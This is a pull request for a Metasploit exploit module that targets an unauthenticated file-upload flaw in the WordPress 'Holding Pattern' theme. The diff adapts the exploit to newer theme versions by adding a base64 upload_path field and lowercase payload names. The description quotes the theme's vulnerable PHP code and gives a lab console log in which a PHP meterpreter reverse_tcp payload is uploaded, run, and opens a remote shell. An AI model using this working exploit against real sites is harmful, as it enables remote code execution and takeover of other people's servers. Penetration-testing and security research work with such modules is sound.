### PR TITLE
Fix problem causing upload to fail on versions 1.2 and 1.3 of theme

### DIFF
--- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
@@ -63,8 +63,15 @@ class Metasploit3 < Msf::Exploit::Remote
     data = Rex::MIME::Message.new
     target_ip = IPSocket.getaddress(rhost)
     field_name = Rex::Text.md5(target_ip)
+
+    # In versions 1.2 and 1.3 of the theme, the upload directory must
+    # be encoded in base64 and sent with the request. To maintain
+    # compatibility with the hardcoded path of ../uploads in prior
+    # versions, we will send the same path in the request.
+    upload_path = Rex::Text.encode_base64('../uploads')
+
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
-    data.add_part('Li4vdXBsb2Fkcw==', nil, nil, 'form-data; name="upload_path"')
+    data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
     data
   end
 

--- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
@@ -43,6 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
     ))
   end
 
+  def check
+    check_theme_version_from_readme('holding_pattern')
+  end
+
   def rhost
     datastore['RHOST']
   end
@@ -60,12 +64,13 @@ class Metasploit3 < Msf::Exploit::Remote
     target_ip = IPSocket.getaddress(rhost)
     field_name = Rex::Text.md5(target_ip)
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
+    data.add_part('Li4vdXBsb2Fkcw==', nil, nil, 'form-data; name="upload_path"')
     data
   end
 
   def exploit
     print_status("#{peer} - Preparing payload...")
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
     data = generate_mime_message(payload, payload_name)
 
     print_status("#{peer} - Uploading payload...")


### PR DESCRIPTION
In the later versions of the theme, the upload directory was changed from the constant value of `../uploads/` to instead taking a value specified via the posted fields in base64 format with no trailing slash:

``` php
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
```

I've added the extra field so that in these versions, it still uploads into the same directory as the earlier versions and have also changed the payload name to be generated using only lower case characters, as in later versions it forces filenames to be lower case:

``` php
$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
  if(chmod($file,0777)):
    echo "success"; 
  else:
    echo "error".$_FILES[$upload_security]['tmp_name'];
  endif;
else:
  echo "error".$_FILES[$upload_security]['tmp_name'];
endif;
```

In addition, I've also implemented the `check` function for this.

Output from test after modifications:

```
msf > use exploit/unix/webapp/wp_holding_pattern_file_upload 
msf exploit(wp_holding_pattern_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_holding_pattern_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_holding_pattern_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_holding_pattern_file_upload) > set LHOST 192.168.1.213
LHOST => 192.168.1.213
msf exploit(wp_holding_pattern_file_upload) > check
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf exploit(wp_holding_pattern_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.213:4444 
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload...
[*] 192.168.1.15:80 - Executing the payload at /wordpress/wp-content/themes/holding_pattern/uploads/augsogqsgm.php
[*] Sending stage (33068 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.213:4444 -> 192.168.1.15:39653) at 2016-01-17 13:52:56 -0500
[+] Deleted augsogqsgm.php

meterpreter > 
```
